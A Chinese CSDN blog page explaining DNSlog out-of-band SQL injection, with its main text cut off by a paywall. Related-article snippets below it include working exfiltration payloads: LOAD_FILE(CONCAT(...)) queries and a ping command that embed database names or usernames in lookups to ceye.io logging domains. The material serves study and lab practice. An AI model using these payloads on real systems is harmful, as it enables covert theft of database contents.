SQL注入之DNS_log注入

最新推荐文章于 2024-06-28 11:53:51 发布
最新推荐文章于 2024-06-28 11:53:51 发布
阅读量746 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 数据库 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47785246/article/details/118660096
版权
本文介绍了DNS_log注入的原理,即通过SQL注入使目标服务器访问特定域名,从而在DNS服务器的日志中留下敏感信息。文章还提供了靶场实战,包括DNSlog平台和封神台靶场的使用方法,展示了如何利用lode_file()函数构造语句获取数据库信息。
摘要由CSDN通过智能技术生成

SQL注入之DNS_log注入

这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。

文章目录


前言

关于SQL注入的详细内容请看我之前写的文章

提示:以下是本篇文章正文内容,下面案例可供参考

一、DNS_log注入原理

  • 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而SQL注入则是针对于动态网页,通过客户端构造SQL语句进行数据库越权限查询数据。

  • 关于DNS解析我们要说明的是,网络上的DNS服务器有很多台,不同的域名会有明确的分工,所以当查询某一个特定的域名时,就会向特定的域名发起查询,这时在对应的DNS服务器上就会留下对应的log(即日志),而域名本身存不存在并不重要,因为只要发起查询就会留下日志。

  • 由此,我们很自然的想到,我们可以通过将我们感兴趣的数据段构造成某个域名,通过SQL注入漏洞使得目标服务器进行访问该域名,进而使得敏感信息以log的形式留在DNS服务器上ÿ

最低0.47元/天 解锁文章
Shelldooor
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 339
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
DNS_LOG注入
学习、分享、交流
05-19 1589
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给带出来···
安全工具】DNSlog工具原理搭建及使用(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
06-28 2028
比如说,我注册了一个为luomiweixiong.com的域名,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog中会记录下他给test.luomiweixiong.com解析,解析值为139.x.x.x.网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DNSLOG 注入
qq_33441500的博客
10-21 700
DNSLOG 注入 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获...
SQL注入DNSLog外带注入
dragon的博客
02-21 2756
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
dnslogsql注入
weixin_44894463的博客
07-09 232
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
DNSLog注入
errorr0
06-27 1147
DNSLog注入漏洞
other_note:除了前端外的笔记
04-08
XSS攻击则是通过注入恶意脚本到网页中,对用户造成威胁,防御手段包括输入验证、输出编码和使用HTTPOnly cookie等。 7. 数据库数据库是存储和管理数据的系统,包括关系型数据库(如MySQL、PostgreSQL)和非关系型...
[主机域名]域名网址搜索器(含源码)_companysearcher(ASP.NET源码).rar
06-06
7. 安全性:由于涉及用户输入,防止SQL注入和XSS攻击是非常重要的。ASP.NET提供了验证控件和模型绑定等特性来帮助确保数据安全。源码中应有相应的安全措施,例如参数化查询或使用ORM(对象关系映射)工具。 8. 性能...
PHP实例开发源码-IP域名归属地查询接口PHP开源版.zip
10-15
使用参数化查询或预编译语句可以防止SQL注入,对输出进行过滤或转义则能抵抗XSS。 7. 开源许可证: 作为开源版本,项目通常会遵循某种开源许可证,如MIT、GPL等。这些许可证规定了其他开发者可以如何使用、修改和...
PHP实例开发源码—OpenNetAdmin 主机管理系统.zip
11-12
OpenNetAdmin可能会使用PHP的过滤和验证函数防止SQL注入、XSS攻击等,同时通过HTTPS协议提供加密的数据传输,保证用户信息的安全。 综上所述,OpenNetAdmin主机管理系统利用PHP的强大功能,实现了全面的网络服务...
PHP实例开发源码-域名管理器 v0.1.zip
10-17
9. **安全措施**:考虑到Web应用的安全性,开发者可能会使用预防SQL注入、XSS攻击的策略,如预编译语句、参数绑定、htmlspecialchars函数等。 10. **API接口**:如果系统需要与第三方服务交互,如DNS提供商的API,...
SQL注入DnsLog注入
qq_52310755的博客
03-22 1988
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 729
SQL注入——DNSlog注入
使用dnslog进行sql注入
CPriLuke的博客
07-12 698
这里主要是补充一下ADO老师在对dnslog进行注入前,对于dnslog的补充说明: 首先登陆http://ceye.io/注册一个账号,并进行登录,登录后在http://ceye.io/profile获取你的域名和token. 测试自己的dnslog是否正常, 直接在网页发送http: 在dnslog的http请求下查询是否存在有该记录: ...
SQL DNSlog注入详解
永远是少年
08-07 1330
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
SQL注入-DNSlog注入(手工加工具使用)
没有
04-17 6781
DNSlog注入
dnslog注入
qq_40039615的博客
06-11 171
首先 ceye是一个网站 不是一个应用程序 http://ceye.io 这个是他的网址 操作: ping %USERNAME%.b182oj.ceye.io curl sk7s6n.ceye.io 核心语法:Loadfile 函数只能在windows操作系统执行,所以目标一定要是windows操作系统 SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.sk7s6n.ceye.io\\test')); 官方.
SQL注入 sql_delete_syntax
07-09
在谈论SQL注入时,"sql_delete_syntax"可能指的是SQL语句中的DELETE语法。DELETE语句用于从数据库中删除记录。 以下是一些常见的SQL删除语句的语法示例: 1. 删除整个表中的所有记录: DELETE FROM 表名; 2. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值